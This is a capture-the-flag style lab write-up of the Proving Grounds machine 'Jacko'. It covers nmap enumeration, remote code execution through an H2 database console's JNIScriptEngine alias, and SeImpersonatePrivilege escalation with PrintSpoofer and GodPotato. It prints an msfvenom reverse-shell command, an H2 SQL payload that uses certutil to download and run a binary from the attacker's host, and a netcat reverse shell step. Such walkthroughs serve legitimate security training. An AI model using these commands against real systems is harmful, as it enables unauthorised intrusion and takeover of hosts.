root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

First eumeration with nmap

# Nmap 7.94SVN scan initiated Tue Feb 27 17:09:48 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 80,135,139,445,5040,8082,9092 -Pn 192.168.154.66
Nmap scan report for 192.168.154.66
Host is up (0.63s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5040/tcp open  unknown
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
9092/tcp open  XmlIpcRegSvc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 37s
| smb2-time: 
|   date: 2024-02-27T16:13:15
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 17:12:58 2024 -- 1 IP address (1 host up) scanned in 189.71 seconds

Enumerating port 8082

image

from the nmap scan we notice a H2 databases service is running on port 8082. opening it on a browser we got a login page.

image

clicking the connect button and was able to login

image

checking online found an exploit on exploit-db.

image

follow the exploitation steps. and we can trigger RCE.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Jacko]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=443 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

first generate a reverse shell payload with msf venom.

image

image

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://192.168.45.187/reverse.exe C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');

upload the shell into the target.

image

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');

trigger the shell

image

Boom we got a reverse shell.

Privilege Escalation

image

running whoami cmmand was not working, so we upload whoami.exe bin to the target.

image

checking the privs we can run, we got to see user tony has SeImpersonatePrivilege enabled, let’s run printspoofer.exe.

image

upload prinspoofer.exe

image

printspoofer did not work, so we used godpototato.exe.

image

spawned a cmd shell…

image

cmd shell didn’t work, so upload a net.exe. that didn’t work either.

image

Uploaded nc64.exe binary and we using godpotato.exe to spawn a reverse shell wih the nc64.exe.

image

And we are through with it 🙂